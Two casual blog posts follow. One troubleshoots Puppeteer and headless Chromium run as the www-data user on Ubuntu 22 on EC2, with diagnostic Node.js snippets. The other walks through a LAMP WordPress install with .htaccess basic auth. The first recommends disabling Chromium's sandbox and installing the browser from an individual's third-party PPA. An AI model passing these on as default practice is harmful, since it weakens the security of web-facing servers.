
Ubuntu + NodeJS + Puppeteer + Chromium (+ PHP 8.2): The Fixes You Need

Ubuntu + NodeJS + Puppeteer + Chromium Is Hard to Work With

I’m gonna make this as quick as possible because this is likely your 10th article on this.

The particulars of my setup, including using PHP to trigger a NodeJS command as the www-data user from apache2, probably don’t apply to you. That is OK. Most of these fixes have nothing to do with PHP; they only came up because PHP runs as a very limited user.

Situation

I wanted NodeJS puppeteer running a headless chromium-browser on an Ubuntu server on AWS EC2 (or any cloud) with a normal Ubuntu AMI. The catch: I was triggering the NodeJS script that runs puppeteer from PHP via a system call, so everything ran as the restricted apache2 user “www-data”.

That’s a lot of tech stack.

It Worked Before

My previous server image and server template were Ubuntu 20.x. After upgrading to Ubuntu 22.x everything broke. It turns out it’s not just Ubuntu 22 but a whole pile of potential issues.

Fixes & Tips

Forget my situation, we’re here to fix your problem.

Node Version – Puppeteer Needs At Least Node 18

You need at least Node 18 to run puppeteer. You can check your current Node version via `node -v`.
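If you’d rather have the script itself complain when it lands on an old Node, a guard like this at the top of your entry file can do it. This is only a sketch: `MIN_NODE_MAJOR`, `nodeMajor` and `isNodeNewEnough` are names I made up for illustration, and 18 is just the minimum mentioned above.

```javascript
// Hypothetical guard: fail fast when the Node running this script is too old.
const MIN_NODE_MAJOR = 18; // the minimum mentioned above; adjust for your puppeteer version

// Pull the major version number out of a string like "v18.19.0" or "18.19.0".
function nodeMajor(version) {
    return Number.parseInt(String(version).replace(/^v/, "").split(".")[0], 10);
}

// True when the given version string meets the minimum major version.
function isNodeNewEnough(version, minMajor = MIN_NODE_MAJOR) {
    return nodeMajor(version) >= minMajor;
}

if (!isNodeNewEnough(process.version)) {
    console.error(`Node ${process.version} is too old; need at least ${MIN_NODE_MAJOR}.`);
    process.exitCode = 1; // signal failure to whatever process called us
}
```

Because it checks `process.version`, it reports on the Node that is actually executing the script, which is the one that matters when a different user runs it.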

Are You Using nvm?

You may be using nvm to manage your node versions, like many many people.

This can make your situation confusing because nvm is per user.

If the user running puppeteer + chromium-browser has nvm, you need to make sure nvm is using at least Node 18.

When nvm installs a new version of NodeJS for a user it doesn’t set that version to the default version. You have to do that manually. Here is a command which will do that and ensure that every time that user executes a NodeJS script it uses the version of NodeJS you want.

nvm alias default 18

Restricted Users, like www-data, Cannot Have nvm

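Restricted users cannot have nvm. nvm lives in a user’s home directory and gets loaded by that user’s shell profile, and a user like www-data normally has no login shell to load it. So how do they manage NodeJS versions?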

Restricted users like www-data use the global node version. This is the version of node installed on the server for all users, similar to other packages you install via apt-get install.

You need to make sure this version of node is fully upgraded to Node 18 or greater as well.
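To see which Node a restricted user really gets, have that user run a tiny script that reports on itself. A minimal sketch, assuming you save it under some name like whoami.js (hypothetical) and run it the same way your real script gets run; `describeRuntime` and `currentUser` are made-up names.

```javascript
// Hypothetical diagnostic: report which user and which Node binary are running this script.
const os = require("os");

// Best-effort user name; falls back to the numeric uid if the account has no passwd entry.
function currentUser() {
    try {
        return os.userInfo().username;
    } catch (err) {
        return `uid ${process.getuid ? process.getuid() : "unknown"}`;
    }
}

function describeRuntime() {
    return {
        user: currentUser(),          // e.g. "www-data" when triggered from apache2
        nodeBinary: process.execPath, // absolute path of the node executable in use
        nodeVersion: process.version, // e.g. "v18.19.0"
    };
}

console.log(JSON.stringify(describeRuntime(), null, 2));
```

Running it as yourself and then as the restricted user (for example with `sudo -u www-data node whoami.js`) should make any difference in Node binaries obvious.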

npm install

You probably ran npm install in your project directory. It installed puppeteer and puppeteer installed a version of chromium-browser.

Things have now officially become a mess. Welcome to package hell.

Errors

Can’t Find Chromium

Error: Could not find Chrome (ver. 119.0.6045.105). This can occur if either 1. you did not perform an installation before running the script (e.g. `npm install`) or 2. your cache path is incorrectly configured (which is: /var/www/.cache/puppeteer). For (2), check out our guide on configuring puppeteer at https://pptr.dev/guides/configuration.

This was happening to me.

I tried to solve the issue by hardcoding my “executablePath” in the puppeteer.launch call. That made my situation worse: everything would hang and time out without errors when I manually supplied the correct executablePath. Do not hardcode “executablePath”: ‘/usr/bin/chromium-browser’ in your puppeteer.launch config.

Fix:
You want to be running the set of packages you installed from your package.json and not any other versions. Duh, right? Well, that means you need to make sure you know where they are.

When you execute this NodeJS script from some other process you probably forgot to change directories as part of your system call. Even if you specified the full path to the script, the actual process running as the restricted user may not be in the right place. If that’s the case, it will try to use the global install of puppeteer. If that exists it will look for Chromium in some weird place and never find it. Check where you are and where NodeJS thinks it’s getting the packages from:

pwd; npm root;

Whoops! You’re not in the right place! But look what we just did: we combined shell commands with that semicolon. Do the exact same thing in your system calls before invoking your NodeJS script as your restricted user, and it will look in the right place.

cd /path/to/project; node index.js

That means you also probably want to remove any *global* versions of puppeteer you think you installed. Why? Because it’s very likely your restricted user will run the global version. The global package will run and suddenly your project will return an error on puppeteer.launch that it can’t find Chromium because it’s looking in some weird place. Perhaps you installed it previously, who knows. Ditch the global version if you can.

npm -g uninstall puppeteer

Remember, the /var/www/ path in that error is specific to my PHP setup. Yours may be different.
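You can run the same “where am I and where are my packages” check from inside Node, which is handy when the script is launched by another process and you can’t easily see its shell. A rough sketch; `describeResolution` is a made-up helper name, and note that `require.resolve` looks things up relative to the file it is called from.

```javascript
// Hypothetical diagnostic: show the working directory and where a package would load from.
function describeResolution(packageName) {
    let resolvedPath = null;
    try {
        resolvedPath = require.resolve(packageName); // throws if the package cannot be found
    } catch (err) {
        resolvedPath = null;
    }
    return {
        cwd: process.cwd(),                                    // same as `pwd` for this process
        searchPaths: require.resolve.paths(packageName) || [], // node_modules folders Node will try
        resolvedPath,                                          // null means nothing was found
    };
}

console.log(describeResolution("puppeteer"));
```

If `resolvedPath` points somewhere outside your project directory, that is the copy of puppeteer your restricted user is actually loading.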

Ubuntu Snap Issue

user.slice/user-1000.slice/session-270.scope is not a snap cgroup
system.slice/apache2.service is not a snap cgroup

This is happening to thousands of people. Why? Ubuntu 22. It leans on Snap, a type of package management that ships each package as one complete bundle rather than piling up shared dependencies. It also locks packages off a little bit more. You don’t need to know or care about it right now because NO MATTER WHAT YOU DO YOU CANNOT FIX SNAP.

Why? Because this article is about me running on AWS EC2 or any other cloud hosting. You don’t have kernel access like this on the Ubuntu AMI! You can’t fix this even with a boot script. Don’t bother with DBUS_SESSION_BUS_ADDRESS, don’t bother with systemd.unified_cgroup_hierarchy=0, and don’t bother with any of it. That’s for the schlubs running Ubuntu on desktop or neckbeards with kernel access.

Fix:
I’m very sorry but your only option will be to download the deb version of chromium-browser from some random person’s package repository. This person is allegedly an engineer at Cisco and it’s all public and on the up-and-up, but there isn’t any other way around it. Installing the deb version of chromium-browser lets you use headless chromium-browser without snap or snap cgroups.

sudo apt remove chromium-browser
sudo snap remove chromium
sudo add-apt-repository ppa:saiarcot895/chromium-beta
sudo apt update
sudo apt install chromium-browser
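After the install it’s worth confirming that the restricted user can actually start the browser before puppeteer gets involved. Here is a small smoke test you could run as that user. It’s a sketch: `probeBinary` is a made-up helper, and the /usr/bin/chromium-browser path is an assumption, so check yours with `which chromium-browser`.

```javascript
// Hypothetical smoke test: can the current user actually start this binary?
const { spawnSync } = require("child_process");

function probeBinary(binaryPath, args = ["--version"]) {
    // Give up after 10 seconds so a hanging browser doesn't hang this script too.
    const result = spawnSync(binaryPath, args, { encoding: "utf8", timeout: 10000 });
    return {
        ok: !result.error && result.status === 0, // false on spawn failure, timeout, or non-zero exit
        stdout: (result.stdout || "").trim(),
        stderr: (result.stderr || "").trim(),     // snap cgroup complaints should show up here
    };
}

// Assumed install path; adjust to wherever the package put the browser.
console.log(probeBinary("/usr/bin/chromium-browser"));
```

If `ok` comes back false, the `stderr` field is the first place to look.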

Other Fixes for Random Errors

Those errors above are so gnarly and so far down the rabbit hole I had to write this entire blog post. The rest of the errors are a cakewalk.

Permissions: Add args To puppeteer.launch

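You forgot the args for puppeteer.launch.

const browser = await puppeteer.launch({
    headless: true, // boolean, not the string "true"
    // Chromium's sandbox usually can't start under a restricted user like www-data
    args: ["--no-sandbox", "--disable-setuid-sandbox"],
});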
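For context, here is how that launch call might sit inside a complete script. Treat it as a sketch, not the one true setup: `fetchTitle` and `LAUNCH_OPTIONS` are made-up names, the URL in the example is a placeholder, and `dumpio` and `timeout` are extras I’d add while debugging a launch that hangs without errors.

```javascript
// A fuller sketch of the launch call; assumes puppeteer is installed in this project.
const LAUNCH_OPTIONS = {
    headless: true,                                     // boolean, not the string "true"
    args: ["--no-sandbox", "--disable-setuid-sandbox"], // for when Chromium can't set up its sandbox
    dumpio: true,                                       // pipe Chromium's stdout/stderr to this process
    timeout: 30000,                                     // ms to wait for the browser to start
};

async function fetchTitle(url) {
    const puppeteer = require("puppeteer"); // loaded here so the options can be inspected without it
    const browser = await puppeteer.launch(LAUNCH_OPTIONS);
    try {
        const page = await browser.newPage();
        await page.goto(url, { waitUntil: "domcontentloaded" });
        return await page.title();
    } finally {
        await browser.close(); // always close, or headless Chromium processes pile up
    }
}

// Example: fetchTitle("https://example.com").then(console.log).catch(console.error);
```

With `dumpio` on, whatever Chromium prints while starting ends up in your script’s output, which beats staring at a silent timeout.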

More Permissions

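You may need to explicitly set the cacheDirectory. It is not a puppeteer.launch option: puppeteer reads it from its configuration file (for example .puppeteerrc.cjs in your project directory) or from the PUPPETEER_CACHE_DIR environment variable. You need to figure this location out yourself and make sure any restricted users have permissions to get at it. After changing it you will likely need to reinstall puppeteer so the browser download lands in the new location.

// .puppeteerrc.cjs (in the project directory)
module.exports = {
    cacheDirectory: "/path/to/my/.cache/puppeteer",
};

// index.js
const browser = await puppeteer.launch({
    headless: true,
    args: ["--no-sandbox", "--disable-setuid-sandbox"],
});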
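To check the “permissions to get at it” part, you can ask Node directly while running as the restricted user. A minimal sketch; `canUseDirectory` is a made-up helper, and the path is the placeholder from the example above, not a real location.

```javascript
// Hypothetical check: can the current user read and enter this directory?
const fs = require("fs");

function canUseDirectory(dirPath) {
    try {
        // R_OK = readable, X_OK = searchable (needed to open files inside a directory)
        fs.accessSync(dirPath, fs.constants.R_OK | fs.constants.X_OK);
        return fs.statSync(dirPath).isDirectory();
    } catch (err) {
        return false; // missing path or permission denied
    }
}

// Placeholder path; swap in your real cache directory.
console.log(canUseDirectory("/path/to/my/.cache/puppeteer"));
```

A `false` here when run as www-data, but `true` when run as yourself, points at ownership or permissions on the cache directory rather than at puppeteer.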

I Just Saved Your Project.

You owe me a follow on Twitter: @kickiniteasy

First Post! Server Is Live On EC2 with WordPress…

Hello World, EC2, and WordPress

It’s really not a big deal to get a server running in a new deployment with Amazon AWS EC2 and WordPress (WP). You can find tons of articles all over the Internet if you don’t have the knowledge yourself. For a typical WordPress deployment I don’t even normally recommend running an EC2 server given the ops overhead of an EC2 deployment. But if you’re well past a hello world and comfortable spinning up servers in the cloud then EC2 is the obvious choice. If you aren’t technical you’re better off using someone like Bluehost and their WordPress install.

Create an Instance, Have a Key

I picked Ubuntu because I’m lazy. If you’re using stock WordPress to get running you should be running a LAMP (Linux, Apache, MySQL, PHP) stack to save some hassle. That is pretty much AWS 101 stuff and we’re not looking at it here. Sorry kiddies. If you’re using EC2 you need an SSH key pair from AWS. Get your shiz running, SSH on to your server, sudo and then come back.

Confusing Code

This will either confuse you or this is some simple shit for you. Take what you need from here if you don’t have it installed.

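#packages
sudo apt-get install lamp-server^
sudo apt-get install apache2-utils
# php5-* are the package names from when this was written; newer Ubuntu releases drop the version number (php-intl, php-curl)
sudo apt-get install php5-geoip
sudo apt-get install php5-intl
sudo apt-get install php5-curl

#apache
a2enmod expires
a2enmod deflate
a2enmod rewrite
# restart apache so the newly enabled modules load
service apache2 restart

#wordpress
wget https://wordpress.org/latest.tar.gz
tar -xzvf latest.tar.gz -C /var/www/html/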

Setup for EC2 and WordPress details

As usual WordPress annoyingly unpacks into a wordpress directory. Set up your Apache vhost to point to /var/www/html/wordpress or wherever you installed WP. Then follow the usual nonsense of setting up WordPress.

Create a database and a database user with a password. Don’t forget to grant the permissions. Copy wp-config-sample.php to wp-config.php and set the values for your DB user. Create your .htaccess file. Don’t be a shmuck: at least use htpasswd on your wp-login and wp-admin. What’s the point of EC2 if you’re not gonna trick this sucker out?

htpasswd -c /var/www/html/.htpasswd yourhtpasswdusername

WordPress .htaccess file

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

<FilesMatch "wp-login">
AuthUserFile /var/www/html/.htpasswd
AuthType Basic
AuthName "Wordpress Login"
Require valid-user
</FilesMatch>

<FilesMatch "wp-admin">
AuthUserFile /var/www/html/.htpasswd
AuthType Basic
AuthName "Wordpress Admin"
Require valid-user
</FilesMatch>

Done? Done. DONE. Wait…

I mean kinda? Go to your URL and you’ll see the installation process. After that apparently there are a million fields to fill out. And let’s not forget your whole situation with root owning the files in /var/www/html, and what about FTPing and your SSH keys with user permissions and how WordPress updates its themes and plugins… OH WOW. Yeah, see, you just installed WordPress on EC2 and there it is glowing brightly in the night with a default theme and post and you realize… a dev’s work is never done.
